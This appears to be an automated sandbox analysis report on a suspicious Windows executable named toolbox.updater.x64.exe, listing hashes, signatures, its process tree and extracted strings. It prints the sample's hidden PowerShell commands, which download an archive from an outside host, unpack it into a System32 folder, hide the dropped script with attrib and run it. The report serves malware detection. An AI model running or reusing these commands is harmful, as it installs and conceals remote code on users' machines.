Analysis Report toolbox.updater.x64.exe

Overview

General Information

Sample Name: toolbox.updater.x64.exe
Analysis ID: 323322
MD5: bde4351613c5ebf5c4b30729ab50acd0
SHA1: 13ebbf56e7d93482712dcd4c6b6866a40e5560db
SHA256: 0cf73f9d6f6ca82b35c79ea947026f3f1c87d6dc12bf6591357ba417fdebe3df

Detection

Score: 26
Range: 0 - 100
Whitelisted: false
Confidence: 80%

Signatures

Suspicious powershell command line found
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • toolbox.updater.x64.exe (PID: 7160 cmdline: 'C:\Users\user\Desktop\toolbox.updater.x64.exe' MD5: BDE4351613C5EBF5C4B30729AB50ACD0)
    • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 496 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • powershell.exe (PID: 6136 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-US MD5: 95000560239032BC68B4C2FDFCDEF913)
    • attrib.exe (PID: 6664 cmdline: 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd MD5: FDC601145CD289C6FBC96D3F805F3CD7)
    • attrib.exe (PID: 6692 cmdline: 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US MD5: FDC601145CD289C6FBC96D3F805F3CD7)
    • powershell.exe (PID: 6728 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' C:\Windows\System32\wbem\en-US\update.cmd MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Hiding Files with Attrib.exe
Source: Process started
Author: Sami Ruohonen
Data:
  Command: 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd
  CommandLine: 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd
  CommandLine|base64offset|contains:
  Image: C:\Windows\System32\attrib.exe
  NewProcessName: C:\Windows\System32\attrib.exe
  OriginalFileName: C:\Windows\System32\attrib.exe
  ParentCommandLine: 'C:\Users\user\Desktop\toolbox.updater.x64.exe'
  ParentImage: C:\Users\user\Desktop\toolbox.updater.x64.exe
  ParentProcessId: 7160
  ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd
  ProcessId: 6664

Signature Overview

Source: powershell.exe, 00000002.00000002.668598377.00000282B8EEC000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.679481008.000001E5F766C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.715732922.00000252B982C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.707252029.00000252A1645000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: toolbox.updater.x64.exe, 00000000.00000002.694354112.0000000002531000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.669043918.00000282B9041000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.679992499.000001E580001000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.706675027.00000252A12E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.707252029.00000252A1645000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.666506406.00000282B6F50000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.669043918.00000282B9041000.00000004.00000001.sdmp | String found in binary or memory: http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z
Source: powershell.exe, 00000002.00000002.667108518.00000282B89F0000.00000004.00000040.sdmp, powershell.exe, 00000002.00000002.668443505.00000282B8E80000.00000004.00000001.sdmp | String found in binary or memory: http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z-t5
Source: powershell.exe, 00000002.00000002.666889217.00000282B7120000.00000004.00000040.sdmp | String found in binary or memory: http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z-t5sProgramFil
Source: powershell.exe, 00000002.00000002.669629568.00000282B9248000.00000004.00000001.sdmp | String found in binary or memory: http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z0y2
Source: powershell.exe, 00000002.00000002.666633430.00000282B6FD6000.00000004.00000020.sdmp | String found in binary or memory: http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7zkA
Source: powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.707252029.00000252A1645000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.714170115.00000252A2BA3000.00000004.00000001.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.668658456.00000282B8F04000.00000004.00000001.sdmp | String found in binary or memory: https://go.microsoft.co&
Source: powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Code function: 0_2_00007FFA35BA59A4
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Code function: 0_2_00007FFA35BA24D0
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Code function: 0_2_00007FFA35BAAA3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFA35BB2BD5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFA35BB0D30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFA35BB0CD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFA35C534D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFA35BB1998
Source: toolbox.updater.x64.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: toolbox.updater.x64.exe | Static PE information: No import functions for PE file found
Source: toolbox.updater.x64.exe | Binary or memory string: OriginalFilename vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.700903775.000000001ADE0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.700903775.000000001ADE0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000003.658386103.000000001C27B000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMsMpLics.dllj% vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000000.650399283.00000000000A2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameGHOST UPDATER8 vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.694254248.00000000024C0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.694470226.00000000025BF000.00000004.00000001.sdmp | Binary or memory string: OriginalFileName vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.693672433.0000000000610000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dllj% vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.693688216.000000000062A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.693860752.0000000000820000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.694034186.0000000000890000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe | Binary or memory string: OriginalFilenameGHOST UPDATER8 vs toolbox.updater.x64.exe
Source: classification engine | Classification label: sus26.winEXE@13/11@0/0
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\toolbox.updater.x64.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdcsclge.euw.ps1
Source: toolbox.updater.x64.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\toolbox.updater.x64.exe 'C:\Users\user\Desktop\toolbox.updater.x64.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-US
Source: unknown | Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd
Source: unknown | Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' C:\Windows\System32\wbem\en-US\update.cmd
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-US
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' C:\Windows\System32\wbem\en-US\update.cmd
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: toolbox.updater.x64.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: toolbox.updater.x64.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.685452875.000001E5F76CF000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.685452875.000001E5F76CF000.00000004.00000001.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.685540885.000001E5F7740000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdbv source: toolbox.updater.x64.exe, 00000000.00000002.700648095.000000001AD62000.00000004.00000001.sdmp
Source: Binary string: n.pdb- source: powershell.exe, 00000002.00000002.668658456.00000282B8F04000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: toolbox.updater.x64.exe, 00000000.00000002.700648095.000000001AD62000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbPATHR source: powershell.exe, 00000003.00000002.685452875.000001E5F76CF000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.668598377.00000282B8EEC000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbI source: powershell.exe, 00000003.00000002.685452875.000001E5F76CF000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb[G source: powershell.exe, 00000002.00000002.668598377.00000282B8EEC000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbPRO< source: powershell.exe, 00000003.00000002.685452875.000001E5F76CF000.00000004.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-US
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-US
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Code function: 0_2_00007FFA35BA1FDB push ebp; ret 0_2_00007FFA35BA201A
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Code function: 0_2_00007FFA35BA1FB9 push eax; ret 0_2_00007FFA35BA1FBA
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Code function: 0_2_00007FFA35BA1B00 push edx; ret 0_2_00007FFA35BA1FDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFA35BB37E7 push esp; retf 2_2_00007FFA35BB37E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFA35B83B47 push esp; retf 3_2_00007FFA35B83B48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFA35BB3583 push eax; ret 6_2_00007FFA35BB3591
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFA35BB4CE5 push edi; retf 6_2_00007FFA35BB4CE6
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
